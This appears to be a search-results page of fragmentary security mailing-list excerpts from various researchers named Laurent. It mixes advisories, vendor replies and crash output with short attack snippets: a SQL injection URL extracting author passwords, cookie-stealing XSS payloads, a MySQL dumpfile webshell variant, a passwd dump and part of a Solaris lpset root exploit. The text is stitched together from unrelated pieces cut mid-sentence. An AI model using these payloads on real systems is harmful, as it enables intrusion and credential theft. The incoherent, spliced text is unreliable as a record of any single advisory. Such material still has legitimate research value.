n2own/CSW exploit from Vincenzo
Iozzo, Ralf Philipp Weinmann, and Willem Pinckaers
A workaround for this latest vulnerability (CVE-2011-1290) could be to
disable JavaScript, as explained on RIM resources.
You should definitely read this: http://www.blackberry.com/btsc/KB26132
Have a nice day,
ations are available here:
http://blog.tehtri-security.com/2011/03/about-iphone-ios43-personal-hotspot.html
Happy update this week for lucky owners of iPhone / http://apple.com/ios
Best regards,
Laurent Oudot, CEO TEHTRI-Security
Web: http://www.tehtri-security.com
twt: @tehtris
Join us for more h
"Good night, and Good luck."
Best regards,
Laurent OUDOT, from Washington DC, USA @BlackHatDC Briefings
( http://blackhat.com/html/bh-dc-11/bh-dc-11-briefings.html#Oudot )
TEHTRI-Security - "This is not a Game."
http://www.tehtri-security.com/
http://twitter/tehtris
010-1752" here too: http://support.apple.com/kb/HT4435 ).
Happy update, Apple folks ;-)
Best regards,
Laurent OUDOT, from Abu Dhabi, UAE @ BlackHat Briefings
( http://blackhat.com/html/bh-ad-10/bh-ad-10-briefings.html#Oudot )
TEHTRI-Security - "This is not a Game."
http://www.tehtri-security.com/
http://twitter/tehtris
12 October ) :
http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274
See you soon at the awesome international conference HITBSecConf
Malaysia 2010,
Laurent OUDOT, CEO & Founder TEHTRI-Security
http://www.tehtri-security.com/
* References:
- BBC => http://www.bbc.co.uk
y.com/en/agenda.php
See you soon.
Thanks. Take care.
Laurent Oudot, founder & CEO of TEHTRI-Security
TEHTRI-Security, "This is not a game".
http://www.tehtri-security.com
emote File Disclos
More explanations available on our web site:
http://www.tehtri-security.com/en/news.php
Do not hesitate to contact us directly if needed.
Best regards,
Take care.
Laurent OUDOT - "TEHTRI-Security, This is not a game."
CEO & Founder of TEHTRI-Security
http://www.tehtri-security.com/
urity issues, do not hesitate to contact us, so that we can
help and assist you with our innovative technologies or our trainings.
Laurent OUDOT, Founder and CEO of TEHTRI-Security
http://www.tehtri-security.com
Next public confirmed event worldwide :
- SyScan Singapore (SG), June, Speakers "Str
p
of a web attack (backdoors, bounces...) and how to detect them
See you soon at HITBSecConf Dubai...
Laurent OUDOT, founder & CEO of TEHTRI-Security, "/This is not a game./"
http://www.tehtri-security.com
There is no SQL Injection Vulnerability in WebTools as we are not using
Database. MyDocs url ("/wt3/
summary.php?select=") is safe as "select" is just name of a variable and the
name is nothing to do with select command in SQL.
Please provide details about the Fiery model and version so that we
sco/Linksys web site. Any other
wireless device relying on this vulnerable wireless driver is likely to
be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti from France Telecom
/ Orange
cess point firmwares.
This security vulnerability was reported to Netgear, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent
There is a flaw in the way OSCommerce handles sessions.
When a client visits a OSCommerce web page, the server sends a cookie. That
cookie will be the session cookie for every further requests. Thus, once logged
in, the cookie will be used to authenticate the user.
When logging in (without
Gabriel Campana and Laurent Butti
from France Telecom / Orange
this vulnerable wireless driver is
likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
lity was reported to Linksys, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
ver for their access point firmwares.
This security vulnerability was reported to Netgear, updated firmwares
should be available on their web site. Any other wireless device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered
ess device relying
on this vulnerable wireless driver is likely to be vulnerable.
Credits:
* This vulnerability was discovered by Laurent Butti and Julien Tinnes
from France Telecom / Orange
public release of advisory
Credits:
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange
0
eip=73d22054 esp=00dff278 ebp=00dff200 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
MFC42!Ordinal5163+0x492:
73d22054 8908mov dword ptr [eax],ecx ds:0023:41414141=
=
5)Credits
laurent gaffié
laurent.gaffie[at]gmail[dot]com
Hi there
Original advisory:
http://milw0rm.com/exploits/5458
There's another stack-based buffer overflow in demux_nfs.c
line 111:
this->copyright = strdup(&header[0x4E]);
line 189:
char copyright[100];
line 208:
sprintf(copyright, "(C) %s", this->copyright);
Regards Laurent Gaffié
Please can you do a simple SEARCH before you start an 'audit' on a software ?
http://search.securityfocus.com/swsearch?query=netclassifieds&sbm=%2F&submit=Search%21&metaname=alldoc&sort=swishrank
http://milw0rm.com/exploits/4092
http://www.securityfocus.com/archive/1/471944
Thanks for sea
lor
-SetHREF
-SetMovieName
-SetTarget
-SetMatrix
=
3)Proof of concept
=
Proof of concept example [works with the others functions supplyed in section
2) ] :
sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub
=
5)Credits
=====
l
close($FILE);
print "$file has been created \n";
,
konqueror will crash.
=
3)Proof of concept
=
Proof of concept example :
4)Greets
Berga,team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
tation (core dumped)
[EMAIL PROTECTED]:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'
Erreur de segmentation (core dumped)
4)Greets
Benjilenoob,team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
=
3)Proof of concept
=
Proof of concept example :
result:
[EMAIL PROTECTED]:~/Desktop# php shot.php
Erreur de segmentation (core dumped)
[EMAIL PROTECTED]:~/Desktop#
4)Greets
Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh
=
5)Credits
=
laurent gaffié
IE7
using the avivra idea/exemple showed on his video
here's a live exemple:
http://dams083.free.fr/pdf_poc.exe?1.pdf
pdf is open , calc.exe is launched no promt .
we can imagine the impact with a:
-permanent Xss
-malicious webpage
-worm
-etc
regards laurent gaffié
//sorry for the delay.
"Credits Goes To Aria-Security Team"
http://www.securityfocus.com/archive/1/451594
.htt
.itpc
.itms
.dvr-ms
.dib
.asf
.tif
etc ...
=
5) Conclusion
=
this is very funny , because actually it only works for .exe extensions.
.COM , .PIF , etc you CANT do this. ( overwrite the extension , and then
bypass the filter)
i guess we can wonder what the heck.
regards laurent gaffié
!
an exemple can be given in the demo website :
http://www.greensql.net/sql-injection-test fill login or password with
alert(document.cookie)
then go in the admin panel :http://demo.greensql.net/ xss will be executed .
=====
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
start to trust theses kinds of functions and then let
some holes in the wall letting in the water, your shared env will be down
very soon .
So i guess the question should be :
"shall i let a software drive my security or shall i rtfm and start to
know what i'am doing ?"//not talking o
mon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
variant : select 'http://site.com/hello.html";)?>' into dumpfile
'/home/NOT_MY_USER/www/index1.php';
=
4)Credits & greets
===
de segmentation
debian:/home/lorenzo#
4)Greets
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone &
#nibbles
=
5)Credits
=
laurent gaffié
[EMAIL PROTECTED]
secorizon coming soon !
4)Greets
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone &
#nibbles
=
5)Credits
=
laurent gaffié
[EMAIL PROTECTED]
secorizon coming soon !
ntation fault.
[Switching to Thread -1216637248 (LWP 29543)]
0xb77d9d1b in iconv_open () from /lib/tls/libc.so.6
4)Greets
Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
from worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
stay tuned, site comming soon
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
stay tuned, site comming soon
=
5)Credits
=
Laurent gaffie
contact : [EMAIL PROTECTED]
stay tuned, site comming soon
ignal SIGSEGV, Segmentation fault.
[Switching to Thread -1215031616 (LWP 11156)]
0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6
4)Greets
Ivanlef0u,Deimos,benji,soh
,and everyones on worldnet: #futurezone &
#nibbles
=
5)Credits
=
Laurent gaffie
contact :
"Firefox will do the same if it's configured that.Is this the default behavior
with Safari?"
yes it's a default setting .
"I don't see that this is a bug. Could you explain a little more fully?"
well configured like this by default,it's a security hole . it's a perfect hole
for a virus, trojan
desktop without any prompt ... )
=
4) Conclusion
=
Any potentially dangerous file should be prompted(like .exe , .com , .pif , etc
)
before uploading the file .
regards laurent gaffié
diffusing this kind of false advisory.
regards laurent gaffié
code, unless to do a basic search with your editor for :
-include($
-include_once($
-require($
-require_once($
plz guys stop diffusing this kind of false advisory.
regards laurent gaffié
s Hamid Ebadi has mention
$lang is also vulnerable to directory transversal
=
4)Credits
=
laurent gaffie
contact : [EMAIL PROTECTED]
d.php?mod=publisher&op=viewarticle&cid=2&artid=-9+union+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/*
regards laurent gaffié
contact : [EMAIL PROTECTED]
yes )
this will avoid juicy errors , such as table name and the complete query
3) imageresizer.php
line 2:
ADD :
ini_set(display_errors,"0");
( same reason as Common.php )
line 100 :
replace : echo("$msg
file=".__FILE__."")
BY
echo("error while processing
ot;>alert(document.cookie)
Full path :
http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1
http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A
http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0
regards laurent gaffie
contact: [EMAIL PROTECTED]
Database Name $config['prefix'] = "cp";
...
'8725ade7b722d1ad43b7b949162eab4d'
ps1:
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263652F5F636F6E6669672E706870
--> /usr/local/apache2/htdocs/cpcommerce/_config.php
ps2: /**/cpAccounts/* --> cp = prefix.
Accounts --> table_name .
(cp is the default one) so you can try with your table prefix .
regards laurent gaffie
7%20from%20news_comment/*
//information is in the source code.
*
0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61646D696E2F636F6E6E2E706870
= /usr/local/apache2/htdocs/dgnews/admin/conf.php
ps: works regardless of php.ini settings .
regards laurent gaffie
eges.
your file will be located here:
./jetbox/webfiles/yourfile.php
solution:
1) xss --> use: http://us.php.net/manual/en/function.htmlentities.php
2) upload script :
--> allow only certains extension like :
txt,mp3,zip,rar,pdf,odt,doc...etc...
regards laurent gaffié.
d .
reminder:
permanent xss are dangerous ...
see : http://en.wikipedia.org/wiki/Cross_site_scripting
regards laurent gaffié
contact: laurent.gaffie[at]g/**/m/**/a/**/i/**/l.com
With the version 3.04 this security issue is fixed
download and try it: http://worksystem.sourceforge.net
best regards
Laurent
On 22 Jun 2006 at 10:36, Darren Clarke wrote:
> Tested and confirmed on Opera 9.00 built 8482.
> Interesting this also managed to crash Notepad.exe on Windows XP SP2
> Home Edition when viewing the source of the page in IE7 Beta 2.
>
Discussed here http://my.opera.com/community/forums/topic.dml?
erl source) :
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# [EMAIL PROTECTED]
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require
> Add this line: extra_cmd=NULL;
> in file ext/standard/mail.c, (line #152, juste before if (extra_cmd !=
> NULL) { ) :
> and recompile php.
You can also use extra_cmd = php_escape_shell_cmd(extra_cmd);
to unescape all characters.
In latest CVS you can see
extra_cmd = php_escape_shell_arg(Z
> Add this line: extra_cmd=NULL;
> in file ext/standard/mail.c, (line #152, juste before if (extra_cmd !=
> NULL) { ) :
> and recompile php.
You can also use extra_cmd = php_escape_shell_cmd(extra_cmd);
to unescape all characters.
In latest CVS you can see
extra_cmd = php_escape_shell_arg(Z_
php mail() function does not do check for escape shell commandes,
even if php is running in safe_mode.
So it's may be possible to bypass the safe_mode restriction and gain
shell access.
Affected:
php4.0.6
php4.0.5
Significatives lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.
y problem, I guess fopen/fwrite ...
are also a security problem as the attacker can also use fopen/fwrite
function to create the file 's2' in /tmp for example.
In this case the problem is that the attacker is able to upload and
execute a PHP script. And this is not PHP safe_mode fault.
So for me error_log do not break safe_mode.
--
Laurent Papier - Admin. systeme
Sdv Plurimedia - <http://www.sdv.fr>
be used with open_basedir directive in
order to limit user filesystem access.
As error_log is limited by open_basedir, suexec is not needed to have a
secure system as long as open_basedir is correctly set.
I see nothing wrong allowing user to use error_log.
I don't think PHP-team should change the error-log function.
--
Laurent Papier - Admin. systeme
Sdv Plurimedia - <http://www.sdv.fr>
CTED]
>>PGP Key (DSS) http://naif.itapac.net/naif.asc
>>
>>Home Page URL:http://www.inet.it
>>Sede: Via Darwin, 85 20019 Settimo Milanese (MI)
>>Tel: 02-328631 Fax: 02-328637701
>>--
>>Free a
the internet. SUQ.DIQ can be found at
>http://suq_diq.tripod.com
>
>
>Kim Vanvaeck
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologique", "The Technology Watcher"
Cheers,
Also available on multiple sites (technotronic, Argosnet, rootshell, ...) since a very
long time.
As said previously, will mail the Sparc version
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
Hi,
I got this exploit working on multiple Solaris (2.5.1, 2.6 & 7), Sparc version.
It is similar, but based on lpset command instead of lp, but root privileges gained in
a second.
Will mail it soon.
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
fprintf(stderr, "ret: 0x%lx xlen: %d ofs: 0x%lx (%d)\n",
ret, strlen(buf)-2, ofs, ofs);
execl("/usr/bin/lpset","lpset","-n","xfn","-a",&buf[2],"lpcol1",0);
perror("execl");
}
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologique", "The Technology Watcher"
>
>Hello Laurent,
>
>My name is Tal Benzion and I work on the Timbuktu product in Netopia. I am
>pleased to let you know that we have fixed the DoS problem with Timbuktu Pro
>2000, released on March 15th. This is in regards to your findings, posted
>on WIN2K http://
or example)
- Stop Timbuktu services
- Start them again.
Patches:
Not yet
Netopia is now aware of this.
Best regards
Laurent LEVIER
IT Systems & Networks, Unix System Engineer
Security Specialist
Argosnet Security Server : http://www.Argosnet.com
"Le Veilleur Technologiqu
67 matches
Mail list logo